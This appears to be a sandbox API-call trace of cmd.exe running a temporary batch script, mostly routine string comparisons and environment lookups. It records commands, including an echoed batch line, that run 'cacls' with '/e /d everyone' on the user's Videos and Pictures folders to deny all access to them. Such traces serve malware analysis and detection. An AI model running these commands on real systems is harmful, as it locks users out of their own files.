_wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.989] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.989] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.989] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.989] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.989] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.989] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.989] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.989] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.989] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.989] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0035.989] SetErrorMode (uMode=0x0) returned 0x0 [0035.989] SetErrorMode (uMode=0x1) returned 0x0 [0035.990] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1baf0, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0035.990] SetErrorMode (uMode=0x0) returned 0x1 [0035.990] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.990] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.990] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.990] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.990] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0035.990] GetLastError () returned 0x2 [0035.990] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.990] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18540 [0035.990] FindClose (in: hFindFile=0xd18540 | out: hFindFile=0xd18540) returned 1 [0035.990] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0035.990] GetLastError () returned 0x2 [0035.990] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18540 [0035.990] FindClose (in: hFindFile=0xd18540 | out: hFindFile=0xd18540) returned 1 [0035.990] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.990] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.990] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0035.991] SetErrorMode (uMode=0x0) returned 0x0 [0035.991] SetErrorMode (uMode=0x1) returned 0x0 [0035.991] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd15fa0, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0035.991] SetErrorMode (uMode=0x0) returned 0x1 [0035.991] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.991] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.991] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.991] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.991] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0035.991] GetLastError () returned 0x2 [0035.991] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.991] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bef0 [0035.991] FindClose (in: hFindFile=0xd1bef0 | out: hFindFile=0xd1bef0) returned 1 [0035.991] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0035.991] GetLastError () returned 0x2 [0035.991] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd1bef0 [0035.991] FindClose (in: hFindFile=0xd1bef0 | out: hFindFile=0xd1bef0) returned 1 [0035.991] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.991] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.991] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.005] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.005] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.005] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.005] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.005] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.005] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.005] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.006] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.006] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.006] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Videos\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Users\\5JgHKoaOfdp\\Videos\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Videos\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x94, hThread=0x8c, dwProcessId=0xb90, dwThreadId=0xb94)) returned 1 [0036.009] CloseHandle (hObject=0x8c) returned 1 [0036.009] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.009] GetEnvironmentStringsW () returned 0xd1b020* [0036.009] FreeEnvironmentStringsA (penv="=") returned 1 [0036.009] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.009] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0036.009] _close (_FileHandle=4) returned 0 [0036.009] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0036.059] GetExitCodeProcess (in: hProcess=0x80, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0036.059] CloseHandle (hObject=0x80) returned 1 [0036.060] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0036.145] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0036.145] CloseHandle (hObject=0x94) returned 1 [0036.145] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.145] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0036.146] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.146] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0036.146] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.146] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.146] SetConsoleInputExeNameW () returned 0x1 [0036.146] GetConsoleOutputCP () returned 0x1b5 [0036.146] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.146] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.147] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0036.147] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0036.147] _get_osfhandle (_FileHandle=3) returned 0x94 [0036.147] SetFilePointer (in: hFile=0x94, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0036.147] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0036.147] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x692, lpOverlapped=0x0) returned 1 [0036.147] SetFilePointer (in: hFile=0x94, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0036.147] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n\n\r\n=%%i\r\n") returned 64 [0036.147] GetFileType (hFile=0x94) returned 0x1 [0036.147] _get_osfhandle (_FileHandle=3) returned 0x94 [0036.147] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0036.147] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0036.148] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.148] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.148] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.148] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.148] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.148] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.148] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.148] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0036.148] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0036.148] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0036.148] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0036.148] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0036.148] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0036.148] _tell (_FileHandle=3) returned 1052 [0036.148] _close (_FileHandle=3) returned 0 [0036.148] _pipe (in: _PtHandles=0xd25f30, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd25f30) returned 0 [0036.148] _dup (_FileHandle=1) returned 5 [0036.148] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0036.148] _close (_FileHandle=4) returned 0 [0036.148] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.148] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.148] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.148] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.148] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.148] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.148] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.148] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.148] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.148] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.149] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.149] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.149] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.149] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.149] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.149] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.149] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.149] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.149] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.149] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.149] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.149] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0036.149] SetErrorMode (uMode=0x0) returned 0x0 [0036.149] SetErrorMode (uMode=0x1) returned 0x0 [0036.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd18268, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0036.149] SetErrorMode (uMode=0x0) returned 0x1 [0036.149] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0036.149] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.149] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd183a8 [0036.149] FindClose (in: hFindFile=0xd183a8 | out: hFindFile=0xd183a8) returned 1 [0036.149] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0036.149] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0036.149] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.149] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.149] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.150] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.150] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.150] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.150] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x8c, hThread=0x80, dwProcessId=0xb98, dwThreadId=0xb9c)) returned 1 [0036.154] CloseHandle (hObject=0x80) returned 1 [0036.154] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.154] GetEnvironmentStringsW () returned 0xd15f98* [0036.154] FreeEnvironmentStringsA (penv="=") returned 1 [0036.154] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.154] _get_osfhandle (_FileHandle=3) returned 0x94 [0036.154] DuplicateHandle (in: hSourceProcessHandle=0x8c, hSourceHandle=0x94, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0036.154] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0036.154] _close (_FileHandle=5) returned 0 [0036.155] _dup (_FileHandle=0) returned 4 [0036.155] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0036.155] _close (_FileHandle=3) returned 0 [0036.155] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.155] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.155] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.155] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.155] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.155] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.155] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.155] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.155] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.155] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.155] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.155] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.155] _wcsicmp 